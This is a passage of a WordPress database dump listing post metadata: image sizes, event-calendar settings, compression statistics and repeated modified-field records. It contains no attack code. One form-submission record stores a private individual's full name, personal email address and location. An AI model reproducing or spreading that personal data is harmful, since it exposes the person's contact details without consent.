ebp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"JewelsOfWisdom-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161185,266633,'_edit_lock','1651584760:15'),(161186,266633,'_edit_last','15'),(161187,266634,'_wp_attached_file','2022/05/JewelsOfWisdom.webp'),(161183,266633,'boldgrid_in_page_containers','1'),(161184,266633,'_dp_original','266104'),(161181,266633,'passster_protection_type','password'),(151267,266042,'mec_color',''),(151268,266042,'mec_location_id','122'),(151269,266042,'mec_dont_show_map','0'),(151270,266042,'mec_organizer_id','1'),(151271,266042,'mec_read_more',''),(151272,266042,'mec_more_info',''),(151273,266042,'mec_more_info_title',''),(151274,266042,'mec_more_info_target','_self'),(151275,266042,'mec_cost',''),(151276,266042,'mec_currency','a:0:{}'),(151277,266042,'mec_additional_organizer_ids','a:0:{}'),(151278,266042,'mec_additional_location_ids','a:0:{}'),(151279,266042,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151280,266042,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151281,266042,'mec_certain_weekdays','a:0:{}'),(151282,266042,'mec_allday','0'),(151007,265976,'_field_446','Tara'),(133126,263913,'protect_children',''),(133127,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133128,263913,'_EventOrigin','events-calendar'),(133129,263913,'protect_children',''),(133130,263913,'protect_children',''),(133131,263913,'protect_children',''),(133132,263913,'protect_children',''),(133133,263913,'protect_children',''),(133134,263913,'protect_children',''),(133135,263913,'protect_children',''),(133136,263913,'protect_children',''),(133137,263913,'protect_children',''),(133138,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133170,263913,'_EventCurrencyPosition','prefix'),(133139,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133169,263913,'_EventCurrencySymbol',''),(133140,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133168,263913,'_EventDuration','3600'),(133171,263913,'_EventCost',''),(133141,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133167,263913,'_EventEndDateUTC','2021-03-04 03:00:00'),(133142,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133166,263913,'_EventStartDateUTC','2021-03-04 02:00:00'),(133172,263913,'_EventURL',''),(133143,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133165,263913,'_EventEndDate','2021-03-03 20:00:00'),(133173,263913,'_EventTimezone','America/Denver'),(133144,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133164,263913,'_EventStartDate','2021-03-03 19:00:00'),(133174,263913,'_EventTimezoneAbbr','MST'),(133145,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133163,263913,'_EventShowMap',''),(133175,263913,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(133146,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133162,263913,'_EventShowMapLink',''),(133176,263913,'_RTECregistrationsDisabled','1'),(133177,263913,'_RTECdeadlineType','start'),(133147,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133161,263913,'boldgrid_hide_page_title','0'),(133178,263913,'_RTECwhoCanRegister','any'),(133148,263913,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614200364;s:12:\"_EventOrigin\";i:1614200364;s:13:\"_thumbnail_id\";i:1614200920;s:24:\"boldgrid_hide_page_title\";i:1614200364;s:17:\"_EventShowMapLink\";i:1614200364;s:13:\"_EventShowMap\";i:1614200364;s:15:\"_EventStartDate\";i:1614200920;s:13:\"_EventEndDate\";i:1614200920;s:18:\"_EventStartDateUTC\";i:1614200920;s:16:\"_EventEndDateUTC\";i:1614200920;s:14:\"_EventDuration\";i:1614200364;s:20:\"_EventCurrencySymbol\";i:1614200364;s:22:\"_EventCurrencyPosition\";i:1614200364;s:10:\"_EventCost\";i:1614200364;s:9:\"_EventURL\";i:1614200364;s:14:\"_EventTimezone\";i:1614200364;s:18:\"_EventTimezoneAbbr\";i:1614200364;s:27:\"_EventNextPendingRecurrence\";i:1614200364;s:26:\"_RTECregistrationsDisabled\";i:1614200364;s:17:\"_RTECdeadlineType\";i:1614200364;s:19:\"_RTECwhoCanRegister\";i:1614200364;s:23:\"_RTEClimitRegistrations\";i:1614200364;s:21:\"_RTECmaxRegistrations\";i:1614200364;s:16:\"_EventRecurrence\";i:1614200364;s:18:\"_RTECnumRegistered\";i:1614200364;s:13:\"_EventVenueID\";i:1614200364;s:12:\"_dp_original\";i:1614200364;s:10:\"_edit_last\";i:1614200440;s:10:\"post_title\";i:1614200440;s:12:\"post_content\";i:1614201153;s:16:\"tribe_events_cat\";i:1614226648;s:11:\"post_status\";i:1614200920;}'),(133150,263913,'_EventOrigin','events-calendar'),(133151,263913,'_EventOrigin','events-calendar'),(133152,263913,'_EventOrigin','events-calendar'),(133153,263913,'_EventOrigin','events-calendar'),(133154,263913,'_EventOrigin','events-calendar'),(133155,263913,'_EventOrigin','events-calendar'),(133156,263913,'_EventOrigin','events-calendar'),(133157,263913,'_EventOrigin','events-calendar'),(133158,263913,'_EventOrigin','events-calendar'),(133159,263913,'_EventOrigin','events-calendar'),(133160,263913,'_thumbnail_id','263914'),(133149,263913,'_EventOrigin','events-calendar'),(133179,263913,'_RTEClimitRegistrations','0'),(133180,263913,'_RTECmaxRegistrations','30'),(133181,263913,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(133182,263913,'_RTECnumRegistered','0'),(133183,263913,'_EventVenueID','262435'),(133185,263913,'_dp_original','263641'),(133186,263913,'_edit_lock','1614226827:2'),(133187,263913,'_edit_last','2'),(133188,263914,'_wp_attached_file','2021/02/dreaming-1.jpg'),(133189,263914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:472;s:6:\"height\";i:265;s:4:\"file\";s:22:\"2021/02/dreaming-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"dreaming-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"dreaming-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"dreaming-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151180,266036,'smush-info','The file was compressed from 34.12 KB to 33.41 KB saving 2.1 percent using WP-Optimize'),(151181,266036,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34943;s:12:\"smushed-size\";i:34209;s:15:\"savings-percent\";d:2.100000000000000088817841970012523233890533447265625;}'),(151182,265988,'original-file','2021/11/esc-oct-sem-bk-1-updraft-pre-smush-original.jpg'),(151183,265988,'smush-complete','1'),(151184,265988,'smush-info','The file was compressed from 84.16 KB to 81.34 KB saving 3.35 percent using WP-Optimize'),(151185,265988,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86177;s:12:\"smushed-size\";i:83292;s:15:\"savings-percent\";d:3.350000000000000088817841970012523233890533447265625;}'),(161180,266633,'passster_activate_protection',NULL),(161179,266633,'passster_activate_global_protection',NULL),(161167,266633,'mec_ticket_variations','a:0:{}'),(161168,266633,'mec_reg_fields_global_inheritance','1'),(161169,266633,'mec_reg_fields','a:0:{}'),(161170,266633,'mec_bfixed_fields','a:0:{}'),(161171,266633,'mec_op','a:0:{}'),(161172,266633,'mec_fields','a:0:{}'),(161173,266633,'mec_event_status','EventScheduled'),(161174,266633,'mec_moved_online_link',''),(161175,266633,'mec_cancelled_reason',''),(161176,266633,'mec_display_cancellation_reason_in_single_page',''),(161177,266633,'boldgrid_hide_page_title','0'),(161178,266633,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150983,265944,'original-file','2021/11/podcast-bk-5-updraft-pre-smush-original.jpg'),(133268,263914,'original-file','2021/02/dreaming-1-updraft-pre-smush-original.jpg'),(133269,263914,'smush-complete','1'),(133270,263914,'smush-info','The file was compressed from 28.39 KB to 27.38 KB saving 3.58 percent using WP-Optimize'),(133271,263914,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:29074;s:12:\"smushed-size\";i:28034;s:15:\"savings-percent\";d:3.5800000000000000710542735760100185871124267578125;}'),(133272,263922,'_field_224','Kathleen'),(133273,263922,'_field_225','Holmby'),(133274,263922,'_field_226','awai.etc@gmail.com'),(133275,263922,'_field_227','CA'),(133276,263922,'_field_228','US'),(133277,263922,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(133278,263922,'_form_id','21'),(133279,263922,'_seq_num','120'),(133280,263923,'protect_children',''),(133281,263923,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614244290;s:12:\"_EventOrigin\";i:1614244290;s:13:\"_thumbnail_id\";i:1614244873;s:24:\"boldgrid_hide_page_title\";i:1614244290;s:17:\"_EventShowMapLink\";i:1614244290;s:13:\"_EventShowMap\";i:1614244290;s:15:\"_EventStartDate\";i:1614244873;s:13:\"_EventEndDate\";i:1614244873;s:18:\"_EventStartDateUTC\";i:1614244873;s:16:\"_EventEndDateUTC\";i:1614244873;s:14:\"_EventDuration\";i:1614244290;s:20:\"_EventCurrencySymbol\";i:1614244290;s:22:\"_EventCurrencyPosition\";i:1614244290;s:10:\"_EventCost\";i:1614244290;s:9:\"_EventURL\";i:1614244290;s:14:\"_EventTimezone\";i:1614244290;s:18:\"_EventTimezoneAbbr\";i:1614244290;s:27:\"_EventNextPendingRecurrence\";i:1614244290;s:26:\"_RTECregistrationsDisabled\";i:1614244290;s:17:\"_RTECdeadlineType\";i:1614244290;s:19:\"_RTECwhoCanRegister\";i:1614244290;s:23:\"_RTEClimitRegistrations\";i:1614244290;s:21:\"_RTECmaxRegistrations\";i:1614244290;s:16:\"_EventRecurrence\";i:1614244290;s:18:\"_RTECnumRegistered\";i:1614244290;s:13:\"_EventVenueID\";i:1614244290;s:12:\"_dp_original\";i:1614244290;s:10:\"_edit_last\";i:1614244368;s:10:\"post_title\";i:1614244368;s:12:\"post_content\";i:1614245808;s:16:\"tribe_events_cat\";i:1614271008;s:11:\"post_status\";i:1614244873;}'),(133282,263923,'_EventOrigin','events-calendar'),(133283,263923,'protect_children',''),(133284,263923,'protect_children',''),(133285,263923,'protect_children',''),(133286,263923,'protect_children',''),(133287,263923,'protect_children',''),(133288,263923,'protect_children',''),(133289,263923,'protect_children',''),(133290,2639